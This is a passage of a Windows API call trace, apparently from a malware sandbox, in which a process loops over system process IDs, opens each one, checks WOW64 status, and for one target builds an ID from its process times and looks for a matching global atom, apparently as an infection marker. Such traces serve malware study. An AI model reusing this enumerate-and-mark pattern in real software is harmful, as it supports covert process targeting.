	[0078.532] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.532] CloseHandle (hObject=0x224) returned 1
	[0078.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0078.533] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.533] CloseHandle (hObject=0x224) returned 1
	[0078.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0078.533] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.533] CloseHandle (hObject=0x224) returned 1
	[0078.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0078.533] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.533] CloseHandle (hObject=0x224) returned 1
	[0078.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0078.533] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.533] CloseHandle (hObject=0x224) returned 1
	[0078.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0078.533] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.533] CloseHandle (hObject=0x224) returned 1
	[0078.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0078.533] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.533] CloseHandle (hObject=0x224) returned 1
	[0078.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0078.533] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.534] CloseHandle (hObject=0x224) returned 1
	[0078.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0078.534] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.534] CloseHandle (hObject=0x224) returned 1
	[0078.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.534] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.534] CloseHandle (hObject=0x224) returned 1
	[0078.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.534] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.534] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0078.534] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0078.534] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0078.535] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.535] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0078.535] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.535] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0078.535] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0078.535] CloseHandle (hObject=0x224) returned 1
	[0078.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0078.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0078.535] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.535] CloseHandle (hObject=0x224) returned 1
	[0078.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0078.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0078.535] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.535] CloseHandle (hObject=0x224) returned 1
	[0078.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0078.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0078.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0078.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0078.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0078.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0078.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0078.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0078.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0078.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.613] CloseHandle (hObject=0x224) returned 1
	[0078.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0078.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0078.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0078.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.613] CloseHandle (hObject=0x224) returned 1
	[0078.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0078.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0078.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.613] CloseHandle (hObject=0x224) returned 1
	[0078.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0078.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.614] CloseHandle (hObject=0x224) returned 1
	[0078.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0078.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.614] CloseHandle (hObject=0x224) returned 1
	[0078.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0078.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.614] CloseHandle (hObject=0x224) returned 1
	[0078.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0078.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.614] CloseHandle (hObject=0x224) returned 1
	[0078.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0078.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.614] CloseHandle (hObject=0x224) returned 1
	[0078.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0078.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0078.615] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.615] CloseHandle (hObject=0x224) returned 1
	[0078.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0078.615] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.615] CloseHandle (hObject=0x224) returned 1
	[0078.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0078.615] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.615] CloseHandle (hObject=0x224) returned 1
	[0078.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0078.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0078.615] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.615] CloseHandle (hObject=0x224) returned 1
	[0078.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0078.615] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.615] CloseHandle (hObject=0x224) returned 1
	[0078.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0078.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.616] CloseHandle (hObject=0x224) returned 1
	[0078.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0078.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.616] CloseHandle (hObject=0x224) returned 1
	[0078.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0078.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.616] CloseHandle (hObject=0x224) returned 1
	[0078.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0078.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.616] CloseHandle (hObject=0x224) returned 1
	[0078.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0078.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.616] CloseHandle (hObject=0x224) returned 1
	[0078.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0078.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.616] CloseHandle (hObject=0x224) returned 1
	[0078.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0078.616] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.616] CloseHandle (hObject=0x224) returned 1
	[0078.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0078.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.617] CloseHandle (hObject=0x224) returned 1
	[0078.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0078.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.617] CloseHandle (hObject=0x224) returned 1
	[0078.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0078.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.617] CloseHandle (hObject=0x224) returned 1
	[0078.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0078.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.617] CloseHandle (hObject=0x224) returned 1
	[0078.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0078.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.617] CloseHandle (hObject=0x224) returned 1
	[0078.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0078.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.617] CloseHandle (hObject=0x224) returned 1
	[0078.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0078.617] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.617] CloseHandle (hObject=0x224) returned 1
	[0078.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0078.618] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.618] CloseHandle (hObject=0x224) returned 1
	[0078.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0078.618] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.618] CloseHandle (hObject=0x224) returned 1
	[0078.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0078.618] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.618] CloseHandle (hObject=0x224) returned 1
	[0078.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.618] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.618] CloseHandle (hObject=0x224) returned 1
	[0078.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.618] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.618] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0078.619] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0078.619] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0078.619] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.619] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0078.619] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.619] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0078.619] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0078.619] CloseHandle (hObject=0x224) returned 1
	[0078.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0078.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0078.619] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.619] CloseHandle (hObject=0x224) returned 1
	[0078.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0078.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0078.620] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.620] CloseHandle (hObject=0x224) returned 1
	[0078.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0078.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0078.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0078.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0078.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0078.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0078.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0078.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0078.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0078.701] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.701] CloseHandle (hObject=0x224) returned 1
	[0078.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0078.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0078.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0078.701] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.701] CloseHandle (hObject=0x224) returned 1
	[0078.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0078.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0078.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.702] CloseHandle (hObject=0x224) returned 1
	[0078.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0078.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.702] CloseHandle (hObject=0x224) returned 1
	[0078.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0078.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.702] CloseHandle (hObject=0x224) returned 1
	[0078.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0078.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.702] CloseHandle (hObject=0x224) returned 1
	[0078.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0078.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.702] CloseHandle (hObject=0x224) returned 1
	[0078.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0078.702] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.702] CloseHandle (hObject=0x224) returned 1
	[0078.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0078.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0078.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.703] CloseHandle (hObject=0x224) returned 1
	[0078.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0078.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.703] CloseHandle (hObject=0x224) returned 1
	[0078.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0078.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.703] CloseHandle (hObject=0x224) returned 1
	[0078.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0078.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0078.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.703] CloseHandle (hObject=0x224) returned 1
	[0078.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0078.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.703] CloseHandle (hObject=0x224) returned 1
	[0078.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0078.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.704] CloseHandle (hObject=0x224) returned 1
	[0078.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0078.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.704] CloseHandle (hObject=0x224) returned 1
	[0078.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0078.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.704] CloseHandle (hObject=0x224) returned 1
	[0078.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0078.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.704] CloseHandle (hObject=0x224) returned 1
	[0078.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0078.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.704] CloseHandle (hObject=0x224) returned 1
	[0078.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0078.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.704] CloseHandle (hObject=0x224) returned 1
	[0078.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0078.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.704] CloseHandle (hObject=0x224) returned 1
	[0078.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0078.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.705] CloseHandle (hObject=0x224) returned 1
	[0078.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0078.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.705] CloseHandle (hObject=0x224) returned 1
	[0078.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0078.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.705] CloseHandle (hObject=0x224) returned 1
	[0078.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0078.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.705] CloseHandle (hObject=0x224) returned 1
	[0078.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0078.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.705] CloseHandle (hObject=0x224) returned 1
	[0078.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0078.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.705] CloseHandle (hObject=0x224) returned 1
	[0078.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0078.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.705] CloseHandle (hObject=0x224) returned 1
	[0078.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0078.706] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.706] CloseHandle (hObject=0x224) returned 1
	[0078.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0078.706] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.706] CloseHandle (hObject=0x224) returned 1
	[0078.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0078.706] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
